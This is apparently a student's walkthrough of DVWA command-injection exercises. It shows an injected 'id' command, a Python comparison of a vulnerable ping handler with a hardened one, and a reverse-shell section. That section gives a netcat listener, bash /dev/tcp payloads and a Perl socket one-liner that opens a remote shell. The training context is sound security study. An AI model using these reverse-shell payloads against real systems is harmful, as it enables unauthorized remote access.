DVWA Exercises 2
03. Command Injection

Let's try to ping our host
172.17.0.1

Let's try to inject another command
172.17.0.1; id
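
The injection above works because the host parameter is concatenated into a shell command string, so the shell treats `; id` as a second command. The following Python example, added here as an illustration and not DVWA's own (PHP) code, shows the vulnerable pattern beside a hardened handler that accepts only a syntactically valid IP address and passes it to `ping` as an argv list without a shell. The sample inputs are constructed for the example and include the exercise's own `172.17.0.1; id`.

```python
import ipaddress
import subprocess

# Constructed sample inputs: a legitimate host, the injection attempt from the
# exercise, and a hostname (rejected because the allow-list is IP-only).
SAMPLE_INPUTS = ["172.17.0.1", "172.17.0.1; id", "localhost"]


def vulnerable_ping_command(target: str) -> str:
    """Vulnerable pattern: raw user input spliced into a shell command string.

    Returned as a string rather than executed so the effect is visible:
    '172.17.0.1; id' yields 'ping -c 3 172.17.0.1; id', two commands for the shell.
    """
    return "ping -c 3 " + target


def validate_target(target: str):
    """Return an ipaddress object if target is a valid IPv4/IPv6 literal, else None.

    Metacharacters such as ';' can never survive this check, because the
    allow-list is the address grammar itself rather than a deny-list of bad bytes.
    """
    try:
        return ipaddress.ip_address(target.strip())
    except ValueError:
        return None


def safe_ping_argv(target: str) -> list[str]:
    """Hardened form: strict validation, then an argv list so no shell is involved."""
    addr = validate_target(target)
    if addr is None:
        raise ValueError(f"rejected host parameter: {target!r}")
    return ["ping", "-c", "3", str(addr)]


def run_safe_ping(target: str, timeout: float = 15.0) -> str:
    """Execute the hardened command (no shell=True) and return combined output."""
    argv = safe_ping_argv(target)
    result = subprocess.run(argv, capture_output=True, text=True, timeout=timeout)
    return result.stdout + result.stderr


if __name__ == "__main__":
    for user_input in SAMPLE_INPUTS:
        print(f"input {user_input!r}")
        print("  vulnerable command string:", vulnerable_ping_command(user_input))
        try:
            print("  hardened argv:", safe_ping_argv(user_input))
        except ValueError as exc:
            print("  hardened handler:", exc)
```

Run with `python3` to see how each input is treated; `run_safe_ping("172.17.0.1")` actually pings and is left out of the demo loop because it needs network access. The key design choice is that validation is an allow-list (parse as an IP address or reject), and execution never goes through a shell, so even a future validation gap cannot turn a string into a second command.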

04. Command Injection Reverse Shell
Let's search for a nice cheat sheet:

As you can see we get different payloads here. Let's try a bash reverse shell first:
Set up a netcat listener on port 8001
nc -lvnp 8001

Attack payload for bash TCP:
; bash -i >& /dev/tcp/172.17.0.1/8001 0>&1
; /bin/bash -l > /dev/tcp/10.0.0.1/4242 0<&1 2>&1

Both didn't work! I can't see any incoming connection on my netcat listener...
Let's try another one with perl:
perl -e 'use Socket;$i="172.17.0.1";$p=8001;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

And we have a reverse shell :)
